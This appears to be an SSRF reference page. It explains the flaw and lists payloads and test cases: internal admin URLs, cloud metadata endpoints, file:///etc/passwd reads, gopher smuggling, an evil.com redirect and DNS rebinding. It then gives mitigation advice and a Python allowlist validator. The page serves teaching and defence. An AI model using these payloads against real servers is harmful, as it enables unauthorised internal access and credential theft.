SSRF
Description: Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests to internal or external network resources on behalf of the server. This can lead to unauthorized access to internal services, data exfiltration, and potential network enumeration.
Example with Scenario:
Imagine a web application that fetches user-supplied URLs to display a thumbnail of the website. If the application does not validate the URL properly, an attacker can provide a URL pointing to an internal service, such as http://localhost/admin, allowing the attacker to access internal resources.
Payloads:
Access Internal Services:
http://localhost/admin
http://127.0.0.1/admin
http://internal-service.local/admin
Access Metadata Services (Cloud environments):
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/computeMetadata/v1/
Open Redirect Exploitation:
http://example.com/?url=http://evil.com
File Inclusion:
file:///etc/passwd
file:///C:/Windows/system32/drivers/etc/hosts
Protocol Smuggling:
gopher://localhost:11211/_stats
ftp://ftp.example.com/file.txt
DNS Rebinding:
http://malicious.com (which resolves to an internal IP after initial DNS resolution)
Test Cases:
Basic Internal Access:
http://localhost:80
http://127.0.0.1:8080
Private IP Ranges:
http://192.168.1.1:80
http://10.0.0.1:8080
Accessing Metadata Services:
http://169.254.169.254/latest/meta-data/
File Access:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
Alternative Protocols:
ftp://example.com/file.txt
gopher://localhost:11211/_stats
Custom Headers:
http://example.com -H 'Host: internal-service.local'
Mitigation:
Input Validation and Whitelisting:
Validate and sanitize user inputs. Only allow URLs that match a strict whitelist of allowed domains and protocols.
Disable Unnecessary Protocols:
Restrict the application from using protocols other than HTTP/HTTPS.
Network Segmentation:
Ensure the server cannot access internal services or sensitive resources directly.
Metadata Service Protection:
In cloud environments, limit access to metadata services through firewall rules or IAM roles.
Use a URL Parsing Library:
Use a robust URL parsing library to handle URL validation and prevent bypasses using encoding or other tricks.
Timeouts and Retries:
Implement timeouts and retry limits on server-side requests to avoid exploitation of long-running requests.
Monitor and Alert:
Set up monitoring and alerting for unusual server-side request patterns.
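As an added example (not code from the original page), the following Python validator combines the scheme/host whitelisting, protocol restriction, metadata-range blocking and DNS-rebinding concerns from the mitigations above: it accepts only HTTP/HTTPS to allowlisted hosts, resolves the host once, rejects any loopback, private or link-local result (which covers 169.254.169.254), and returns the vetted IP so the fetch connects to it rather than re-resolving the name. The allowlisted hostnames and the resolver results used in the comments are constructed for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist for this example; a real deployment supplies its own.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}


def is_public_address(ip_text: str) -> bool:
    """True only for routable public addresses. Loopback, RFC 1918, link-local
    (169.254.0.0/16 includes the cloud metadata endpoint), multicast, reserved
    and unspecified addresses are all rejected."""
    ip = ipaddress.ip_address(ip_text)
    # An IPv4-mapped IPv6 literal such as ::ffff:127.0.0.1 must be judged as IPv4.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_all(host: str) -> list:
    """Default resolver: every A/AAAA answer for host, as address strings."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_fetch_url(url: str, resolver=resolve_all):
    """Return (ip, reason). ip is None when the URL is rejected.

    The caller should open the connection to the returned ip (keeping the
    original hostname in the Host/SNI fields) instead of resolving the name
    again, so a rebinding DNS answer cannot swap in an internal address
    between the check and the request.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return None, "scheme not allowed"          # blocks file:, gopher:, ftp:
    if parts.username or parts.password:
        return None, "credentials in URL not allowed"
    host = parts.hostname                           # lower-cased, IPv6 brackets removed
    if not host or host not in ALLOWED_HOSTS:
        return None, "host not in allowlist"        # raw IPs never match
    try:
        addrs = resolver(host)
    except OSError:
        return None, "DNS resolution failed"
    if not addrs or not all(is_public_address(a) for a in addrs):
        return None, "host resolves to a non-public address"
    return addrs[0], "ok"
```

Passing a custom resolver (as the tests do) lets the check be exercised offline; in production the default resolver is used and the returned address is what the HTTP client connects to.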